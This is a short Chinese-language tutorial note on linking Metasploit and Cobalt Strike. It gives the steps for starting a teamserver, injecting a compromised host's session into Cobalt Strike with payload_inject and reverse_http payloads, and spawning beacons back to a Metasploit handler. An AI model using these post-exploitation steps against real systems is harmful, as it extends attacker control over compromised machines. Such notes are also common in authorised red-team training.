今天年初六
-
MSF和cs聯動
-
msf連接cs
-
1.在隊伍服務器上啟動cs服務端
- ./teamserver 團隊服務器ip 連接密碼
-
2.cs客戶端連接攻擊機
- 填團隊服務器ip和密碼,名字隨便
-
-
msf將session發往cs客戶端
-
1.cs設置監聽
-
監聽器 - add
- 選擇payload類型和填攻擊機ip,端口要對應payload類型
-
-
2.進入payload注入模塊
- use exploit/windows/local/payload_inject
-
3.設置參數
-
set disablepayloadhandler 1
- 1開啟
-
set payload 第一步選的payload類型
- 后面的協議類型一致
示例:
設置的payload是windows/meterpreter/reverse_http
cs選擇的payload是windows/beacon_http/reverse_http
- 后面的協議類型一致
-
set lhost
- msf本機ip
-
set lport
- 與第一步對應
-
set session
- 目標機的session id
-
-
4.運行
-
run
- cs即可收到session
-
exploit也可
- -j 是隱藏到后台運行,jobs調出
- -z 是連接后不進入終端
-
-
-
cs將shell轉發給另一msf
最好用公網機器,內網機器要轉發端口
-
1.進入handle模塊
-
2.設置handle參數
-
set payload xxxxx
- 全部要一致
-
set lhost
- 本機
-
set lport
- 任意一個,注意不要重復
-
-
3.cs設置spwan
-
1.add 新會話
-
2.設置參數
- msf所在對應的ip和端口
- payload選foreign
-
3.右鍵session,選擇派生會話
- 選擇第二步設置的會話
-
-
4.exploit 運行
- 即可收到cs派生的session
-
-